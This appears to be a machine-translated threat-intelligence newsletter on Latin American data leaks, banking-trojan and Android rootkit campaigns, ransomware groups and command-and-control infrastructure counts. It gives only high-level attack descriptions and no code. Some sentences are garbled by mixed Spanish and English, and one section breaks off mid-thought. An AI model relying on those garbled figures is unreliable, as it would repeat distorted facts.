--[ Anomalía #5 - Latam leaks in circulation - Exfiltradaz arrives ]--

–[ Anomalía #5 - Latam leaks in circulation - Exfiltradaz arrives ]–

  In January 2026, a group operating under the name Chronus published 2.3 terabytes of data from 25 Mexican public institutions. The government responded that the affected systems were obsolete managed by private parties, that the compromised credentials had already been disabled, that there was no breach of central infrastructure. The data continued to circulate on Telegram.

On March 30, a group under the name ChronusTeam published 28 simultaneous breaches against the Argentine State: Central Bank, national ministries, police forces of several provinces, health and education systems. There is no clear public confirmation. Claims continue to circulate in forums and channels.

In Colombia, meanwhile, in addition to accumulation there is also simultaneity. On April 2, multiple leaks appeared that affect public, financial and educational sectors at the same time —from territorial entities to bases associated with national systems—, expanding the scope and risk of exposure of sensitive data.

The pattern is not in the technique, but in what happens after filtration. The bases end up in forums and Telegram channels, are packaged by data type (credentials, KYC, accesses) and are reused in specific phishing and fraud campaigns. Between incidents there is no public traceability or confirmation of mitigation: partial responses or silence. Mexico, Argentina and Colombia repeat the same sequence, with actors changing names but operating on the same data sets and distribution circuits.

Exfiltradaz tries to make this type of pattern visible. This week we launched this initiative to monitor the circulation of data in the region: collection of public signals in forums and channels, structuring of what appears, open publication of data and pipelines on GitHub. It is neither a repository of leaked databases nor an incident verification system. It’s flow tracking.

Insights and data are available directly at Exfiltradaz. You can review it and, as always, comments and contributions are welcome. 💚

–[ Malware ]–

LATAM - Horabot is still active, now with fake CAPTCHA in Mexico

Kaspersky documented an active Horabot campaign focused on Mexico. It is not new —it has been operating since 2020, of Brazilian origin — but the current version has relevant changes. The input vector is no longer just an invoice attachment: it now boots with a fake CAPTCHA page instructing the victim to open a Windows execution window and paste a command. From there a chain of infection is deployed in layers: HTA, VBScript, AutoIT as loader, and finally a banking Trojan loaded directly into memory. Kaspersky found a public database maintained by the attackers where 93% of the victims are in Mexico.

Brazil — Casbaneiro and Horabot together

A recent campaign attributed to a Brazilian actor who combines Horabot with Casbaneiro — a banking Trojan known in the region for years — in an operation that is no longer limited to LATAM: it also targets Spanish speakers in Europe. The group operates two channels in parallel: one via WhatsApp for end users, another via email for corporate environments. The decoy is a false subpoena. What changes from previous campaigns is that the malicious PDF is dynamically generated for each victim, making it difficult to detect by signature. Once inside, the malware hijacks the email account and uses its own contacts to continue distributing the phishing.

Operation NoVoice — rootkit on Google Play, 2.3 million downloads

McAfee documented Operation NoVoice, an Android rootkit campaign distributed across more than 50 apps on Google Play — cleaners, games, gallery utilities — that racked up at least 2.3 million downloads before being removed. The malware exclusively targets devices without a security patch after May 2021, exploiting known vulnerabilities since 2016. On vulnerable devices it achieves full control: it is installed on the system partition, survives a factory reset, and once active it injects code into each app that is opened. The observed payload points to WhatsApp — clones the entire session. The infection graph shows concentration in Africa and Asia,with presence in several LATAM countries where devices circulate that no longer receive security updates.

–[ Leaks ]–

Argentina — 28 gaps announced against the State

A group under the name ChronusTeam published 28 simultaneous breaches against multiple entities of the Argentine State: Central Bank, ministries, police forces and health and education systems. The volume and scope point to a coordinated operation, but there is no clear public technical confirmation on the commitments. Part of the information circulates in forums and channels associated with leaks, where lists of accesses and partial samples appear.

Colombia — multiple leaks in parallel

In recent days several leaks appeared that simultaneously affect public, financial and educational entities in Colombia. Among the cases indicated are the Mayor’s Office of Medellín, Banco Finandina, Banco W and the University of Cauca. Some of the incidents are once again linked to actors that we had already been following, such as NyxarGroup, while others appear associated with different aliases such as Petro_Escobar or DelitosPenales and in recent days these groups have joined together to make leak announcements jointly -. Some of us are already following in Exfiltradaz. The data presented includes personal information, financial histories, administrative records and bases associated with national systems.Some of the material already circulates in forums and channels where this type of dumping is shared.

Brazil / Tanzania — alleged access to municipal and police systems

An actor under the alias cozypandas published access to municipal administration systems in Brazil (Macaíba, Rio Grande do Norte) and mail infrastructure associated with police forces in Tanzania. In the case of Brazil, administrative records with personal data (names, dates of birth and other identifiers) are mentioned. For Tanzania, access would be linked to institutional email accounts with MD5 hashes and weak passwords. There is no public confirmation about the commitment.

–[ Research and tools ]–

Coruna — Kaspersky confirms the link with Operation Triangulation

For those who research iOS in the region, an update on Coruna that we had already mentioned. Kaspersky published the missing code analysis: Coruna is not an assembly of public exploits but a direct evolution of the same framework used in Operation Triangulation. The authors are the same. The kit remained active, and receiving updates —includes support for recent Apple hardware — and the circulation logic between espionage and cybercrime actors that we pointed out before now has a more concrete explanation:

–[ Malicious activity/Ransomware ]–

LATAM — Akira Ransomware for reference

ESET detected a ransomware campaign targeting South America that imitates Akira in almost everything — ransom note, Tor URLs, file extension — but inside it uses code from Babuk, a ransomware whose source code was leaked in 2021 and has been circulating freely since then. Someone using Akira’s name to position the operation. The interesting fact is operational: the branding of established groups is already used as a pressure tool, regardless of actual affiliation.

LATAM — TheGentlemen: ransomware with growing regional presence

Since mid-2025, TheGentlemen has positioned itself as one of the most active ransomware groups. What defines it is not the volume but the method: it studies the defenses of each target, adapts its tools during the intrusion if the controls block it, and operates under a double extortion model. In LATAM it has confirmed victims in Colombia, Argentina, Chile, Brazil and other countries in the region. The target profile is repeated: sectors with sensitive data and critical infrastructure.

–[ ZOLIM - This week’s snapshot (04/02/2026) ]–

  With 13 new IPs in this snapshot, the infrastructure continues to grow.

Some signs from this week:

• GoPhish follow the basis with the majority of nodes and maintain repeated patrons — especially the port 3333 (37 IPs) — in multiple countries and ASNs.
• Quasar sigue en augmento y se mantiene distributed, mientras Sliver crece slightly. DCRat (8) and Havoc (5) appear to be more concentrated in certain countries, especially Colombia and Brazil.
• Brazil continues to concentrate more than 1,000 infraestructural mitad (68 IPs), with São Paulo as the dominant point. Colombia remains stable (14), with activity in Barranquilla and Valledupar associated with DCRat and AsyncRAT.
• New ISPs appear that we had not seen in previous snapshots. One of them in Sinaloa (Mexico) hosting a GoPhish node, outside the usual providers. Infrastructure is moving towards more local networks.
• UnamWebPanel reappears, now combined with Sliver on a node.

The infrastructure continues to be deployed on commercial cloud and regional providers (Oracle, Amazon, Microsoft), with a persistent presence among snapshots.

In ZOLIM you can explore the complete snapshot and the table where we publish all active IPs by country if you want to delve deeper into the data :D

https://zoquelabs.xyz/zolim